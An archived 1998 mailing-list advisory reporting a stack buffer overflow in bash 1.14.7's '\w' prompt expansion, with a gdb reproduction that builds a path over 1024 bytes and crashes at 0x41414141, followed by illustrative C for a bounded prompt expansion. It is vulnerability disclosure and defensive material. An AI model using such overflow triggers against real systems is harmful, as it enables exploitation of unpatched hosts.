Buffer overflow in bash 1.14.7(1)

From: Joao Manuel Carolino (rootat_private)
Date: Fri Sep 04 1998 - 09:09:28 PDT


    If you cd into a directory which has a path name larger than 1024 bytes
    and you have '\w' included in your PS1 environment variable (which makes
    the path to the current working directory appear in each command line
    prompt), a buffer overflow will occur.
    The following was tested on my machine, running Slackware 3.5:
    
    einstein:~# gdb bash
    [...]
    (gdb) r
    Starting program: /bin/bash
    bash# PS1='\w '
    ~ cd /tmp
    /tmp mkdir `perl -e 'print "A" x 255'`
    /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
    /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
    -e 'print "A" x 255'`
    /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
    -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
    /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
    -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x
    255'`
    /tmp cd
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
    (no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x804ed72 in sigprocmask ()
    (gdb) backtrace
    #0  0x804ed72 in sigprocmask ()
    #1  0xe9 in ?? ()
    #2  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141.
    
                                            Regards,
                                                    Joao
    
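The crash above is the classic shape of a fixed-size prompt buffer receiving a working directory longer than it can hold. The C below is an added illustration, not bash source: a bounded `\w` expansion that refuses a directory name which would not fit, exercised against a constructed path of 255-character components like the one built under /tmp in the post. The 1024-byte limit comes from the post; `expand_prompt`, `make_deep_path` and `prompt_len_for_depth` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Fixed prompt buffer size; 1024 is the limit named in the report. */
#define PROMPT_BUF 1024

/* Expand the '\w' escape in a PS1 template into out[outsz] (other escapes
 * are copied literally here). Returns bytes written, or -1 when the result
 * would not fit: out stays NUL-terminated and nothing past it is touched. */
int expand_prompt(const char *ps1, const char *cwd, char *out, size_t outsz)
{
    size_t used = 0;
    if (outsz == 0) return -1;
    for (const char *p = ps1; *p; p++) {
        const char *piece = p;          /* default: copy this one character */
        size_t n = 1;
        if (*p == '\\' && p[1] == 'w') { piece = cwd; n = strlen(cwd); p++; }
        if (n >= outsz - used) { out[used] = '\0'; return -1; } /* no room */
        memcpy(out + used, piece, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* Constructed path in the post's style: depth components of width 'A's. */
size_t make_deep_path(char *buf, size_t bufsz, int depth, size_t width)
{
    size_t len = 0;
    for (int i = 0; i < depth && len + width + 1 < bufsz; i++) {
        buf[len++] = '/';
        memset(buf + len, 'A', width);
        len += width;
    }
    buf[len] = '\0';
    return len;
}

/* Expanded length of PS1='\w ' for a cwd of the given depth, or -1 when the
 * bounded expansion refuses it instead of overrunning the buffer. */
int prompt_len_for_depth(int depth)
{
    static char path[4096], prompt[PROMPT_BUF];
    make_deep_path(path, sizeof path, depth, 255);
    return expand_prompt("\\w ", path, prompt, sizeof prompt);
}

int main(void)
{
    for (int d = 1; d <= 5; d++)
        printf("depth %d: %d\n", d, prompt_len_for_depth(d));
    return 0;
}
```

Each component adds 256 bytes, so the expansion is accepted up to three levels and refused from the fourth, where the unchecked copy in the report starts overwriting the stack.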



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:15:00 PDT